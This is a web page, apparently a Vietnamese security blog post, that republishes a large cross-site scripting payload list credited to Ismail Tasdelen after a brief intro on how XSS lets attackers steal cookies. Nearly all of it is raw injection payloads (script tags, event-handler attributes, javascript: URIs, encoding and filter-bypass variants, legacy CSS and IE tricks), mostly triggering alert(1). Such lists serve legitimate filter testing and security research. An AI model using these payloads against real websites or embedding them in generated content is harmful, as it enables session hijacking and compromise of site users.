XSS Payload List – Cross Site Scripting Vulnerability Payload List

0
417
XSS payload list
XSS payload list

Tấn công Cross-Site Scripting (XSS) là một dạng tấn công kiểu chèn thêm đoạn mã đặc biệt mà đoạn mã này sẽ được thực thi ở website bị lỗi. XSS được thực hiện khi attacker thực hiện chèn nó thường là vào các form thực thi ở browser, tới các người dùng khác nhau. Từ đây attacker có thể chiếm được cookie và rất nhiều thông tin quan trọng khác của người dùng. Với cookie thì hacker có thể đăng nhập website mà không cần biết mật khẩu của người dùng.

Đọc thêm các bài viết về XSS tại :

loading...

XSS Payload List ( Danh sách các cụm từ để kiểm thử lỗi XSS)

 

<!-- Project Name : Cross Site Scripting ( XSS ) Vulnerability Payload List -->
<!-- Author : Ismail Tasdelen -->
<!-- Linkedin : https://www.linkedin.com/in/ismailtasdelen/ -->
<!-- GitHub : https://github.com/ismailtasdelen/ -->
<!-- Twitter : https://twitter.com/ismailtsdln -->
<!-- Medium : https://medium.com/@ismailtasdelen -->

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
<video src=1 href=1 onerror="javascript:alert(1)"></video>
<body src=1 href=1 onerror="javascript:alert(1)"></body>
<image src=1 href=1 onerror="javascript:alert(1)"></image>
<object src=1 href=1 onerror="javascript:alert(1)"></object>
<script src=1 href=1 onerror="javascript:alert(1)"></script>
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
<object onError object onError="javascript:javascript:alert(1)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
<body onload body onload="javascript:javascript:alert(1)"></body onload>
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
\x3Cscript>javascript:alert(1)</script>
'"`><script>/* *\x2Fjavascript:alert(1)// */</script>
<script>javascript:alert(1)</script\x0D
<script>javascript:alert(1)</script\x0A
<script>javascript:alert(1)</script\x0B
<script charset="\x22>javascript:alert(1)</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
`"'><img src='#\x27 onerror=javascript:alert(1)>
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
<script>/* *\x2A/javascript:alert(1)// */</script>
<script>/* *\x00/javascript:alert(1)// */</script>
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>
<script src="data:text/plain\x2Cjavascript:alert(1)"></script>
<script src="data:\xD4\x8F,javascript:alert(1)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
<script src="data:\xCB\x8F,javascript:alert(1)"></script>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
ABC<div style="x:expression\x00(javascript:alert(1)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x09expression(javascript:alert(1)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
ABC<div style="x:\x20expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
ABC<div style="x:\x00expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
"`'><script>\x3Bjavascript:alert(1)</script>
"`'><script>\x0Djavascript:alert(1)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
"`'><script>\x09javascript:alert(1)</script>
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
"`'><script>\x00javascript:alert(1)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
"`'><script>\x0Cjavascript:alert(1)</script>
"`'><script>\x2Bjavascript:alert(1)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
"`'><script>-javascript:alert(1)</script>
"`'><script>\x0Ajavascript:alert(1)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
"`'><script>\x7Ejavascript:alert(1)</script>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
"`'><script>\xC2\x85javascript:alert(1)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
"`'><script>\x21javascript:alert(1)</script>
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
"`'><script>\x0Bjavascript:alert(1)</script>
"`'><script>\x20javascript:alert(1)</script>
"`'><script>\xC2\xA0javascript:alert(1)</script>
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
<script\x2F>javascript:alert(1)</script>
<script\x20>javascript:alert(1)</script>
<script\x0D>javascript:alert(1)</script>
<script\x0A>javascript:alert(1)</script>
<script\x0C>javascript:alert(1)</script>
<script\x00>javascript:alert(1)</script>
<script\x09>javascript:alert(1)</script>
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
`"'><img src=xxx:x onerror\x00=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
`"'><img src=xxx:x onerror\x20=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
<script>javascript:alert(1)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1)" >
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1)//
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
<video><source onerror="javascript:javascript:alert(1)">
<video onerror="javascript:javascript:alert(1)"><source>
<form><button formaction="javascript:javascript:alert(1)">X
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<object data="data:text/html;base64,%(base64)s">
<embed src="data:text/html;base64,%(base64)s">
<b <script>alert(1)</script>0
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">
<image src="javascript:alert(1)">
<script src="javascript:alert(1)">
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo="><script>javascript:alert(1)</script>">
<! foo="><script>javascript:alert(1)</script>">
</ foo="><script>javascript:alert(1)</script>">
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
<% foo><x foo="%><script>javascript:alert(1)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x11src=x onerror="javascript:alert(1)">
<img \x12src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x10src=x onerror="javascript:alert(1)">
<img\x13src=x onerror="javascript:alert(1)">
<img\x32src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x11src=x onerror="javascript:alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x34src=x onerror="javascript:alert(1)">
<img \x39src=x onerror="javascript:alert(1)">
<img \x00src=x onerror="javascript:alert(1)">
<img src\x09=x onerror="javascript:alert(1)">
<img src\x10=x onerror="javascript:alert(1)">
<img src\x13=x onerror="javascript:alert(1)">
<img src\x32=x onerror="javascript:alert(1)">
<img src\x12=x onerror="javascript:alert(1)">
<img src\x11=x onerror="javascript:alert(1)">
<img src\x00=x onerror="javascript:alert(1)">
<img src\x47=x onerror="javascript:alert(1)">
<img src=x\x09onerror="javascript:alert(1)">
<img src=x\x10onerror="javascript:alert(1)">
<img src=x\x11onerror="javascript:alert(1)">
<img src=x\x12onerror="javascript:alert(1)">
<img src=x\x13onerror="javascript:alert(1)">
<img[a][b]src[d]=x[e]onerror=[f]"alert(1)">
<img src=x onerror=\x09"javascript:alert(1)">
<img src=x onerror=\x10"javascript:alert(1)">
<img src=x onerror=\x11"javascript:alert(1)">
<img src=x onerror=\x12"javascript:alert(1)">
<img src=x onerror=\x32"javascript:alert(1)">
<img src=x onerror=\x00"javascript:alert(1)">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//">
<title onpropertychange=javascript:alert(1)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
<!--[if]><script>javascript:alert(1)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
<style>*[{}@import'%(css)s?]</style>X
<div style="font-family:'foo
;color:red;';">XXX
<div style="font-family:foo}color=red;">XXX
<// style=x:expression\28javascript:alert(1)\29>
<style>*{x:expression(javascript:alert(1))}</style>
<div style=content:url(%(svg)s)></div>
<div style="list-style:url(https://foo.f)\20url(javascript:javascript:alert(1));">X
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
<div style="font-family:foo{bar;background:url(https://foo.f/oo};color:red/*/foo.jpg);">X
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
<x style="background:url('x;color:red;/*')">XXX</x>
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
<x style="behavior:url(%(sct)s)">
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
<event-source src="%(event)s" onload="javascript:alert(1)">
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>">
<script>%(payload)s</script>
<script src=%(jscript)s></script>
<script language='javascript' src='%(jscript)s'></script>
<script>javascript:alert(1)</script>
<IMG SRC="javascript:javascript:alert(1);">
<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=`javascript:javascript:alert(1)`>
<SCRIPT SRC=%(jscript)s?<B>
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<IMG SRC="jav ascript:javascript:alert(1);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
<<SCRIPT>%(payload)s//<</SCRIPT>
<IMG SRC="javascript:javascript:alert(1)"
<iframe src=%(scriptlet)s <
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
<IMG DYNSRC="javascript:javascript:alert(1)">
<IMG LOWSRC="javascript:javascript:alert(1)">
<BGSOUND SRC="javascript:javascript:alert(1);">
<BR SIZE="&{javascript:alert(1)}">
<LAYER SRC="%(scriptlet)s"></LAYER>
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
<STYLE>@import'%(css)s';</STYLE>
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
